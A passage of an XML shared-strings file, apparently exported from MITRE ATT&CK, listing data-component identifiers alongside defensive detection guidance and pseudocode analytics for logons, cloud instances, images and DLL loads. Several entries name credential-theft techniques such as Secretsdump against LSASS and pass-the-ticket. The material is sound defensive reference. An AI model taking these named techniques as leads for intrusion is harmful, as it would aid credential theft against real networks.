    <t>Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes and compare against known good baseline behavior.</t>
  </si>
  <si>
    <t>relationship--1579fc90-9b45-4b72-af0a-7edf1fd9d268</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</si>
  <si>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</si>
  <si>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relationship--3fd104a5-1708-46e4-ba7b-a6964913fef0</t>
  </si>
  <si>
    <t>Image Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--b008766d-f34f-4ded-b712-659f59aaed6e</t>
  </si>
  <si>
    <t>attack-pattern--800f9819-7007-4540-a520-40e655876800</t>
  </si>
  <si>
    <t>Monitor for unexpected Docker image build requests to the Docker daemon on hosts in the environment.</t>
  </si>
  <si>
    <t>relationship--113e09ed-f732-44ad-bc8a-5a14c939864f</t>
  </si>
  <si>
    <t>attack-pattern--4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f</t>
  </si>
  <si>
    <t>Monitor interactions with images and containers by users to identify ones that are added anomalously.</t>
  </si>
  <si>
    <t>relationship--b6cc5fef-2bcd-4772-910f-370774e87a4b</t>
  </si>
  <si>
    <t>Monitor the local image registry to make sure malicious images are not added.</t>
  </si>
  <si>
    <t>relationship--8c8de33a-e4b3-4d3c-b1d9-1dbb00beec01</t>
  </si>
  <si>
    <t>Monitor for newly constructed image that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.</t>
  </si>
  <si>
    <t>relationship--d6ab9ff5-5d3a-4d65-974e-57937658c389</t>
  </si>
  <si>
    <t>Image Deletion</t>
  </si>
  <si>
    <t>x-mitre-data-component--8b4ca854-ac08-47da-b24f-601b28a39aff</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of a virtual machine image (ex: Azure Compute Service Images DELETE)</t>
  </si>
  <si>
    <t>relationship--482aa19e-062b-46b2-bf4e-802b64d80504</t>
  </si>
  <si>
    <t>Image Metadata</t>
  </si>
  <si>
    <t>x-mitre-data-component--b597a220-6510-4397-b0d8-342cd2c58827</t>
  </si>
  <si>
    <t>Periodically baseline virtual machine images to identify malicious modifications or additions.</t>
  </si>
  <si>
    <t>relationship--47347ee6-ce33-4803-ab9f-b69064d7f06e</t>
  </si>
  <si>
    <t>Collecting disk and resource filenames for binaries, comparing that the InternalName, OriginalFilename, and/or ProductName match what is expected, could provide useful leads but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball)</t>
  </si>
  <si>
    <t>relationship--92a4392f-5f7d-4299-b4a8-93b14ce1ae7a</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</si>
  <si>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</si>
  <si>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relationship--16c2e736-30e0-4ecb-8f7f-b89b9a983b4a</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</si>
  <si>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</si>
  <si>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relationship--54260ee3-6cb4-43a2-a4a3-5b317d873759</t>
  </si>
  <si>
    <t>Image Modification</t>
  </si>
  <si>
    <t>x-mitre-data-component--071a09b1-8945-46fd-8bb7-6bcc89400963</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</si>
  <si>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</si>
  <si>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relationship--c5d62fbd-ff2e-459a-84a3-462aa73ac01e</t>
  </si>
  <si>
    <t>Instance Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--b5b0e8ae-7436-4951-950a-7b83c4dd3f2c</t>
  </si>
  <si>
    <t>attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c</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</si>
  <si>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</si>
  <si>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relationship--ff876fa3-e156-4696-91a8-ad8996ace076</t>
  </si>
  <si>
    <t>Monitor for newly constructed instances that may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.</t>
  </si>
  <si>
    <t>relationship--e5d571ab-d744-499b-9141-6d4ffc68081d</t>
  </si>
  <si>
    <t>relationship--79c73e97-2bce-4900-b7b8-10528d687ac7</t>
  </si>
  <si>
    <t>attack-pattern--59bd0dec-f8b2-4b9a-9141-37a1e6899761</t>
  </si>
  <si>
    <t>Monitor system logs to review instance activities occurring across all cloud environments and regions.</t>
  </si>
  <si>
    <t>relationship--87276474-6fe9-455f-b3fd-8e79599f8014</t>
  </si>
  <si>
    <t>Monitor for newly constructed instances that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.</t>
  </si>
  <si>
    <t>relationship--a7fea9a4-effe-408a-b397-057a2a9cc25e</t>
  </si>
  <si>
    <t>Instance Deletion</t>
  </si>
  <si>
    <t>x-mitre-data-component--7561ed50-16cb-4826-82c7-c1ddca61785e</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of an instance (ex: instance.delete within GCP Audit Logs)</t>
  </si>
  <si>
    <t>relationship--746e7195-4d9c-4539-b27c-94c78871d09f</t>
  </si>
  <si>
    <t>attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4</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</si>
  <si>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</si>
  <si>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relationship--72802a16-180f-40bb-a80d-721cbc94448d</t>
  </si>
  <si>
    <t>relationship--fe4af180-c8ce-4326-b39b-e08f3f72ccf3</t>
  </si>
  <si>
    <t>Instance Enumeration</t>
  </si>
  <si>
    <t>x-mitre-data-component--2a80d95f-08c4-48e3-833e-151ef19d90f5</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</si>
  <si>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</si>
  <si>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relationship--5ac7ec1d-8da8-49dc-b4e4-680a335f2e16</t>
  </si>
  <si>
    <t>Instance Metadata</t>
  </si>
  <si>
    <t>x-mitre-data-component--45fd904d-6eb0-4b50-8478-a961f09f898b</t>
  </si>
  <si>
    <t>Periodically baseline instances to identify malicious modifications or additions.</t>
  </si>
  <si>
    <t>relationship--ffccbf64-ef54-47c7-a117-389b5eca8047</t>
  </si>
  <si>
    <t>relationship--52164c11-3cc4-4303-9aa6-1f26a345b6d3</t>
  </si>
  <si>
    <t>relationship--002142e4-3942-4c6d-913d-814c1fc93380</t>
  </si>
  <si>
    <t>attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1</t>
  </si>
  <si>
    <t>relationship--b2ed727c-9ce0-476a-ae95-c722f083a28f</t>
  </si>
  <si>
    <t>Monitor and consider configuring alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.</t>
  </si>
  <si>
    <t>relationship--f93054f0-320e-479e-ba67-a642a34afb61</t>
  </si>
  <si>
    <t>Instance Modification</t>
  </si>
  <si>
    <t>x-mitre-data-component--45d0ff14-b9c4-41f5-8603-156657c20b75</t>
  </si>
  <si>
    <t>relationship--42d6f63e-6a97-4efb-973e-77df10275605</t>
  </si>
  <si>
    <t>relationship--d2d6a912-c758-4d2a-aaef-1c36ec30e1cc</t>
  </si>
  <si>
    <t>Instance Start</t>
  </si>
  <si>
    <t>x-mitre-data-component--f8213cde-6b3a-420d-9ab7-41c9af1a919f</t>
  </si>
  <si>
    <t>Monitor for the activation or invocation of an instance (ex: instance.start within GCP Audit Logs)</t>
  </si>
  <si>
    <t>relationship--da713616-e8e6-4170-bcb4-f7c54c41415d</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</si>
  <si>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</si>
  <si>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relationship--8ef166b5-03a0-4bfa-9612-95f680f3f1a7</t>
  </si>
  <si>
    <t>relationship--53eea817-303c-4700-9176-4a21e60a2689</t>
  </si>
  <si>
    <t>relationship--5655b007-87df-410e-9796-b792700e4840</t>
  </si>
  <si>
    <t>Instance Stop</t>
  </si>
  <si>
    <t>x-mitre-data-component--1361e324-b594-4c0e-a517-20cee32b8d7f</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</si>
  <si>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</si>
  <si>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relationship--188af237-b6f2-4b69-9a53-af231eaa52dd</t>
  </si>
  <si>
    <t>relationship--d07acff6-9c10-4c0c-98b2-09f6980ac961</t>
  </si>
  <si>
    <t>Kernel Module Load</t>
  </si>
  <si>
    <t>x-mitre-data-component--23e4ee78-26f3-4fcf-ba43-ab953962f96c</t>
  </si>
  <si>
    <t>relationship--b2bcda58-39af-43b6-bee4-13f1aca103c0</t>
  </si>
  <si>
    <t>Monitor for the installation of kernel modules that could be abused to escape containers on a host.</t>
  </si>
  <si>
    <t>relationship--2768ad63-70a6-4962-865b-e847bc7b0b9c</t>
  </si>
  <si>
    <t>LKMs are typically loaded into &lt;code&gt;/lib/modules&lt;/code&gt; and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)</t>
  </si>
  <si>
    <t>relationship--b155462b-a06f-498f-9615-4812b5fa0dc8</t>
  </si>
  <si>
    <t>Logon Session Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5</t>
  </si>
  <si>
    <t>attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47</t>
  </si>
  <si>
    <t>Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior.</t>
  </si>
  <si>
    <t>relationship--d49dcee7-6729-4b50-80ef-8100c306ffeb</t>
  </si>
  <si>
    <t>attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for suspicious account behavior across cloud services that share account. </t>
  </si>
  <si>
    <t>relationship--cb1a6b6a-cc35-4769-a954-217dfe0a9e8d</t>
  </si>
  <si>
    <t>attack-pattern--e49920b0-6c54-40c1-9571-73723653205f</t>
  </si>
  <si>
    <t>Monitor for newly constructed logon behavior across cloud service management consoles.(Citation: Mandiant Cloudy Logs 2023)</t>
  </si>
  <si>
    <t>relationship--4b366bf4-6ab9-46b6-8ee4-ff3ccd92a3a8</t>
  </si>
  <si>
    <t>attack-pattern--8861073d-d1b8-4941-82ce-dce621d398f0</t>
  </si>
  <si>
    <t>Monitor for newly constructed logon behavior to cloud services. For example, in Azure AD, consider using Identity Protection to monitor for suspicious login behaviors to cloud resources. (Citation: Protecting Microsoft 365 From On-Premises Attacks)</t>
  </si>
  <si>
    <t>relationship--98f0cde7-f11f-4860-8a75-eff81d58b12a</t>
  </si>
  <si>
    <t>Monitor for newly constructed logon behavior across code repositories (e.g. Github) which can be configured to report access to certain pages and documents.</t>
  </si>
  <si>
    <t>relationship--bf598f43-a972-45de-aee8-072884fde758</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</si>
  <si>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</si>
  <si>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relationship--9436696d-f80a-44ae-a93a-82f96c68fd83</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</si>
  <si>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</si>
  <si>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relationship--06e7f684-24c1-4165-9144-c4457074eb10</t>
  </si>
  <si>
    <t>attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d</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</si>
  <si>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</si>
  <si>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relationship--7656cfa4-3e19-47c3-b0b7-7989b39ee148</t>
  </si>
  <si>
    <t>attack-pattern--45241b9e-9bbc-4826-a2cc-78855e51ca09</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor cloud audit logs and host logs for logon session events. These can be found in CloudTrail, Unified Audit Logs, Windows Event Logs and `/var/log/auth.log` or `/var/log/secure` for Linux systems. </t>
  </si>
  <si>
    <t>relationship--adaf9bd2-019e-42e0-be46-e4bbc4ac65cc</t>
  </si>
  <si>
    <t>attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f</t>
  </si>
  <si>
    <t>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&lt;h4&gt;Analytic 1 - Remote Desktop Logon&lt;/h4&gt;
&lt;code&gt;suspicious_netconn = filter network_connections where (event_id = “4624" AND AuthenticationPackageName = 'Negotiate' AND Severity = "Information" AND logon_type = "10")&lt;/code&gt;
&lt;h4&gt;Analytic 2 - Simultaneous Logins on a Host&lt;/h4&gt;
&lt;code&gt;users_grouped = group users_list by hostname
users_grouped = from users_grouped select min(time) as earliest_time, max(time) as latest_time count(user) as user_count
multiple_logins = filter users_grouped where (latest_time - earliest_time &lt;= 1 hour and user_count &gt; 1)&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--1f026982-e045-4a63-b0ec-a075d81e1c32</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</si>
  <si>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</si>
  <si>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relationship--7443ab04-1054-49db-8721-a265ef4972dd</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account). </t>
  </si>
  <si>
    <t>relationship--01673083-1f3c-4995-8842-ac0e735762d6</t>
  </si>
  <si>
    <t>attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c</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</si>
  <si>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</si>
  <si>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relationship--d45bcd1f-4f6e-4ff0-9bad-36cf43ab2df5</t>
  </si>
  <si>
    <t>Monitor for discrepancies in authentication to cloud services, such as PTA sign-ins recorded in Azure AD that lack corresponding events in AD.(Citation: Azure AD PTA Vulnerabilities)</t>
  </si>
  <si>
    <t>relationship--8f327170-23d8-4273-ae1f-81aeb5c243fa</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed logon behavior from credentials being accessed by process memory of the LSASS. For example, detect behaviors of Secretsdump against a system, not being a Domain Controller. </t>
  </si>
  <si>
    <t>relationship--cf0cb87a-2941-4fdc-aa4a-7d7363c41735</t>
  </si>
  <si>
    <t>17 July 2023</t>
  </si>
  <si>
    <t>attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2</t>
  </si>
  <si>
    <t>relationship--518c01b6-fbc0-4039-9732-864627656899</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</si>
  <si>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</si>
  <si>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relationship--2add2e31-58af-4e52-bdd7-5ddd295656a3</t>
  </si>
  <si>
    <t>Monitor for logon sessions for user accounts and devices that did not require MFA for authentication.</t>
  </si>
  <si>
    <t>relationship--02a18600-0baa-49e0-91cb-b4e54f43f84e</t>
  </si>
  <si>
    <t>30 August 2022</t>
  </si>
  <si>
    <t>Monitor 2FA/MFA application logs for suspicious events such as rapid login attempts with valid credentials.</t>
  </si>
  <si>
    <t>relationship--f5bd27f6-6657-46fa-91be-271c85050988</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</si>
  <si>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&lt;h4&gt;Analytic 1&lt;/h4&gt;
&lt;code&gt;logons = filter log_events where (
event_id== "4624" AND 
target_user_name != "ANONYMOUS LOGON" AND
authentication_package_name == "NTLM") &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--4f473df1-98ef-4cca-8669-70b7e70a8640</t>
  </si>
  <si>
    <t>Monitor for newly constructed logon behavior that may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls.</t>
  </si>
  <si>
    <t>relationship--b660587b-40b7-4126-b656-605dbc745722</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</si>
  <si>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</si>
  <si>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relationship--e0b271fb-3d06-47db-9b35-85eb7f7efee6</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</si>
  <si>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</si>
  <si>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relationship--4ed53040-9e56-4069-b764-58598d8c497b</t>
  </si>
  <si>
    <t>attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf</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</si>
  <si>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&lt;h4&gt;Analytic &lt;/h4&gt; 
&lt;code&gt;filtered_logons = filter logon_events where ( (event_id = "4624") AND user NOT IN TOP30(user))&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--5a5abca2-6e7c-4714-a7e0-88d05885bb57</t>
  </si>
  <si>
    <t>relationship--b7e97b7e-6ad6-4c11-85cc-c108c6282bb7</t>
  </si>
  <si>
    <t>Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.</t>
  </si>
  <si>
    <t>relationship--85d3fc32-6cee-418f-bef0-188c61c9fa6d</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</si>
  <si>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&lt;h4&gt; Analytic 1 - New services being created under network logon sessions by non-system users &lt;/h4&gt;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t>
  </si>
  <si>
    <t>relationship--d7c4ba01-d1cd-4472-bbdb-69bf0ca85da9</t>
  </si>
  <si>
    <t>attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2</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</si>
  <si>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</si>
  <si>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relationship--0da580d1-4c87-4ec0-8b1a-52eb02deb582</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</si>
  <si>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</si>
  <si>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relationship--6e9e0836-7d0c-46ec-b1c9-048652075d81</t>
  </si>
  <si>
    <t>attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6</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</si>
  <si>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</si>
  <si>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relationship--0b2f8d87-ea92-48a8-a895-5fe98b01d2b6</t>
  </si>
  <si>
    <t>Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.</t>
  </si>
  <si>
    <t>relationship--9ac69d52-d41e-4a02-9ebc-54a43e4a591a</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</si>
  <si>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</si>
  <si>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relationship--60162382-5417-4930-8226-8d5755f84e13</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</si>
  <si>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</si>
  <si>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relationship--f2dfe70c-701e-4cda-997f-12b91f7eb288</t>
  </si>
  <si>
    <t>Monitor for newly constructed logon behavior that may breach or otherwise leverage organizations who have access to intended victims.</t>
  </si>
  <si>
    <t>relationship--49c92273-9431-4417-b8dd-37f772ad099b</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</si>
  <si>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</si>
  <si>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relationship--35483df6-413c-4c77-b1b9-0acd14f77775</t>
  </si>
  <si>
    <t>attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b</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</si>
  <si>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</si>
  <si>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relationship--9852cd17-d47d-44fc-ab5b-a8c73bc7c307</t>
  </si>
  <si>
    <t>attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81</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</si>
  <si>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</si>
  <si>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relationship--571f784e-af1c-4e0d-bd5c-7b9223187e39</t>
  </si>
  <si>
    <t>attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a</t>
  </si>
  <si>
    <t>relationship--1d552cb4-8c29-47dd-8c06-012d3f4d6ff5</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for user accounts logging into the system via [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. </t>
  </si>
  <si>
    <t>relationship--79fa693d-38b2-4730-8602-1f72eef5ce23</t>
  </si>
  <si>
    <t>Logon Session Metadata</t>
  </si>
  <si>
    <t>x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b</t>
  </si>
  <si>
    <t>Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).</t>
  </si>
  <si>
    <t>relationship--a32b030b-32fb-4e94-b741-1122a33a1d74</t>
  </si>
  <si>
    <t>04 November 2022</t>
  </si>
  <si>
    <t>relationship--74cfafb4-a4ae-4237-bd0b-57dbb14fa7c2</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</si>
  <si>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</si>
  <si>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relationship--c1b53315-fe59-4485-bc15-95b59cc34058</t>
  </si>
  <si>
    <t>18 August 2022</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</si>
  <si>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</si>
  <si>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relationship--9efe8d02-cecd-4e14-9e33-1a03519f4af1</t>
  </si>
  <si>
    <t>relationship--6d6ece55-8e30-431b-9515-1cdb91813b9e</t>
  </si>
  <si>
    <t>Monitor 2FA/MFA application logs for suspicious events such as unusual login attempt source location, mismatch in location of login attempt and smart device approving 2FA/MFA request prompts.</t>
  </si>
  <si>
    <t>relationship--824d6bfc-85e5-4f69-9c0c-a99e5d4777b7</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</si>
  <si>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&lt;h4&gt; Analytic &lt;/h4&gt;
&lt;code&gt;suspicious_logon = filter logons where (event_id = “4624" AND AuthenticationPackageName = 'Negotiate' AND Severity = "Information" AND logon_type = "10")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--79550ebe-890d-4f3e-b494-d65b88215803</t>
  </si>
  <si>
    <t>Consider modifying SAML responses to include custom elements for each service provider. Monitor these custom elements in service provider access logs to detect any anomalous requests.(Citation: Sygnia Golden SAML)</t>
  </si>
  <si>
    <t>relationship--aaecf92d-75de-4767-9471-835353728a5c</t>
  </si>
  <si>
    <t>attack-pattern--d273434a-448e-4598-8e14-607f4a0d5e27</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).</t>
  </si>
  <si>
    <t>relationship--bee65646-c101-4d06-b0eb-5a2857746b6e</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</si>
  <si>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</si>
  <si>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relationship--a5b1dc4d-e8dd-48d8-913a-0e9223b760f7</t>
  </si>
  <si>
    <t>relationship--71f24c43-eec3-4800-8543-7cc9259825a3</t>
  </si>
  <si>
    <t>relationship--ec9653f3-7214-4e41-81f2-478ec407de15</t>
  </si>
  <si>
    <t>Malware Content</t>
  </si>
  <si>
    <t>x-mitre-data-component--167b48f7-76e9-4fcb-9e8d-7121f7bf56c3</t>
  </si>
  <si>
    <t>attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf</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</si>
  <si>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</si>
  <si>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relationship--1652b967-e96f-4c3f-839e-2c7e07b248a7</t>
  </si>
  <si>
    <t>attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0</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</si>
  <si>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</si>
  <si>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relationship--b5dfa67d-4d96-413c-8d35-f20914019303</t>
  </si>
  <si>
    <t>attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970</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</si>
  <si>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</si>
  <si>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relationship--aae621b9-9d10-4cd2-91f0-18f6fc8f8406</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</si>
  <si>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</si>
  <si>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relationship--aed72ec7-c810-4f29-9626-6dad85c3f8d8</t>
  </si>
  <si>
    <t>Malware Metadata</t>
  </si>
  <si>
    <t>x-mitre-data-component--93a6e38c-02a5-44d8-9035-b2e08459f31f</t>
  </si>
  <si>
    <t>attack-pattern--34b3f738-bd64-40e5-a112-29b0542bc8bf</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</si>
  <si>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</si>
  <si>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relationship--dab25d1d-e38b-491d-9842-8de94999744f</t>
  </si>
  <si>
    <t>attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15</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</si>
  <si>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</si>
  <si>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relationship--c98aed07-c64e-41a3-9267-f97dc0a5be5d</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</si>
  <si>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</si>
  <si>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relationship--1c7e778c-4193-44e5-85b4-ba7e7668455f</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</si>
  <si>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</si>
  <si>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relationship--c596a5d9-8206-4140-ad7f-a58d95ea2bba</t>
  </si>
  <si>
    <t>relationship--89adc7a4-e19c-451f-8008-b728a7c0f407</t>
  </si>
  <si>
    <t>relationship--13f2b9d4-b055-4642-baa6-259f512058c7</t>
  </si>
  <si>
    <t>attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0</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</si>
  <si>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</si>
  <si>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relationship--9abd4b46-35d6-474f-be48-da0d631daa59</t>
  </si>
  <si>
    <t>Module Load</t>
  </si>
  <si>
    <t>x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1</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</si>
  <si>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</si>
  <si>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relationship--0f5aaf05-13e0-4959-a788-893f780c9b23</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process.</t>
  </si>
  <si>
    <t>relationship--87d193e1-8418-46d1-81c6-66a6b863e6de</t>
  </si>
  <si>
    <t>relationship--2f52b718-77f8-4931-8a0d-49b4ebba05de</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</si>
  <si>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</si>
  <si>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relationship--cfa1709d-7927-4944-911f-ea75f89e3b71</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.</t>
  </si>
  <si>
    <t>relationship--18e994e4-2e23-4984-b0cb-1a2194cc9537</t>
  </si>
  <si>
    <t>Monitor DLL files that are associated with COR_PROFILER environment variables.</t>
  </si>
  <si>
    <t>relationship--9daa4587-0b04-4ec4-acdf-d29a9c659d65</t>
  </si>
  <si>
    <t>Monitor for events associated with scripting execution, such as the loading of modules associated with scripting languages (ex: JScript.dll or vbscript.dll).</t>
  </si>
  <si>
    <t>relationship--94ed6275-8583-46e6-bd0c-d7253ef9a2ef</t>
  </si>
  <si>
    <t>attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64</t>
  </si>
  <si>
    <t>Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma MMC20 COM Jan 2017)</t>
  </si>
  <si>
    <t>relationship--b9274127-9c6e-4079-a513-75adceceea33</t>
  </si>
  <si>
    <t>Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed.</t>
  </si>
  <si>
    <t>relationship--44b96f2b-8597-44b6-b1f2-85f01553ddaf</t>
  </si>
  <si>
    <t>Monitor for DLL/PE file events, such as the &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;ControlRunDLLAsUser&lt;/code&gt; API functions in shell32.dll.</t>
  </si>
  <si>
    <t>relationship--42987bea-821d-4505-a92c-49da325980f6</t>
  </si>
  <si>
    <t>Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths.</t>
  </si>
  <si>
    <t>relationship--53dc0b4d-d546-431f-b92a-de10beb3bdf3</t>
  </si>
  <si>
    <t>Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.</t>
  </si>
  <si>
    <t>relationship--df8d65b3-99f9-42fb-a6d6-09e0c3a00e08</t>
  </si>
  <si>
    <t>attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd</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</si>
  <si>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</si>
  <si>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relationship--dd6b6ddd-cecc-4181-af98-d6b4ce6a43a7</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</si>
  <si>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</si>
  <si>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relationship--514932f5-9112-498a-aa49-24a797f18d0d</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</si>
  <si>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</si>
  <si>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relationship--a18f1daf-1eed-4e33-8107-76f136925742</t>
  </si>
  <si>
    <t>23 August 2022</t>
  </si>
  <si>
    <t>attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d</t>
  </si>
  <si>
    <t>Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe).</t>
  </si>
  <si>
    <t>relationship--500e5d85-cff1-44e8-869c-0c9ab24622c3</t>
  </si>
  <si>
    <t>Monitor library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.</t>
  </si>
  <si>
    <t>relationship--6f30b61e-a97a-415b-a903-0169f4c00d72</t>
  </si>
  <si>
    <t>attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945</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</si>
  <si>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</si>
  <si>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relationship--cd04ef35-9cac-4a56-af29-1ac6d8a0f1cf</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</si>
  <si>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</si>
  <si>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relationship--1d1d1803-49a0-45b8-b41f-6df17f430423</t>
  </si>
  <si>
    <t>relationship--e04e9e57-90e8-44f7-8596-0fc5365360e1</t>
  </si>
  <si>
    <t>relationship--61347ac0-5e9c-48d1-b7a1-7bb1535941b8</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</si>
  <si>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</si>
  <si>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relationship--32d8952d-39cb-4b6b-8743-2bca4f4bed01</t>
  </si>
  <si>
    <t>attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d</t>
  </si>
  <si>
    <t>relationship--044fa087-7d5a-474c-b074-e519f429a458</t>
  </si>
  <si>
    <t>Monitor for the loading of modules associated with scripting languages (ex: JScript.dll).</t>
  </si>
  <si>
    <t>relationship--402be191-85a7-400e-ba32-fe66c93d116f</t>
  </si>
  <si>
    <t>relationship--ccc5e544-25b0-480c-a7b2-4ed10f5e6605</t>
  </si>
  <si>
    <t>Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)</t>
  </si>
  <si>
    <t>relationship--1c868e1e-349e-4d3f-9033-0d5fee56e622</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</si>
  <si>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</si>
  <si>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relationship--8fc1ca33-dca4-472e-be38-ea8722e4f450</t>
  </si>
  <si>
    <t>relationship--774e95cc-df61-4772-a23e-61b78830f0e3</t>
  </si>
  <si>
    <t>attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670</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</si>
  <si>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</si>
  <si>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relationship--f56d72b4-f479-46e2-a766-41fcdd70d0d0</t>
  </si>
  <si>
    <t>relationship--7f3d9b01-3999-4db2-83eb-f517459b4769</t>
  </si>
  <si>
    <t>Monitoring module loads, especially those not explicitly included in import tables, may highlight obfuscated code functionality. Dynamic malware analysis may also expose signs of code obfuscation.(Citation: BlackHat API Packers)</t>
  </si>
  <si>
    <t>relationship--5d5541d2-a03a-4c96-a696-832dd57c5883</t>
  </si>
  <si>
    <t>relationship--a16f5b08-63b8-41e0-82e2-0c0772c1cfea</t>
  </si>
  <si>
    <t>relationship--ace53417-c3e0-49b6-b3d1-04451b94ee75</t>
  </si>
  <si>
    <t>relationship--ef47c8b8-45ef-415c-8f1d-8421b0add257</t>
  </si>
  <si>
    <t>Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)</t>
  </si>
  <si>
    <t>relationship--97e31242-661f-4aae-866d-26d32fbb88c4</t>
  </si>
  <si>
    <t>Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious.</t>
  </si>
  <si>
    <t>relationship--62ca66d8-fad3-4504-a002-243e3382c280</t>
  </si>
  <si>
    <t>Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)
&lt;h4&gt; Analytic 1 - Processes loading PowerShell assemblies&lt;/h4&gt;
&lt;code&gt;suspicious_processes = filter ProcessGuid, ProcessFilePath, ModulePath, FileDescription where
  EventId == "7"
  AND
  (ModulePath LIKE '%system.management.automation%' OR
   FileDescription LIKE '%system.management.automation%')&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--fa29c7d5-1466-4fe3-9aa8-a4a594be9c3c</t>
  </si>
  <si>
    <t>Monitor for abnormal DLLs that are loaded by `spoolsv.exe`. Print processors that do not correlate with known good software or patching may be suspicious.  New print processor DLLs are written to the print processor directory.</t>
  </si>
  <si>
    <t>relationship--cca1289f-accd-4fbe-902c-b99c6200e707</t>
  </si>
  <si>
    <t>relationship--bc28a305-565f-4a4e-9f71-3956aa19fd9f</t>
  </si>
  <si>
    <t>attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a</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</si>
  <si>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</si>
  <si>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relationship--0c850982-9d06-4b46-a15a-5a9fe5d6ddab</t>
  </si>
  <si>
    <t>relationship--59fee765-c771-4d66-bc8a-ddedb49f43d8</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</si>
  <si>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</si>
  <si>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relationship--3868dccd-cc1d-49b4-a940-6055a4c65746</t>
  </si>
  <si>
    <t xml:space="preserve">Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls. Static Portable Executable (PE) analysis tools can be used to examine and dump the exports of a particular DLL. </t>
  </si>
  <si>
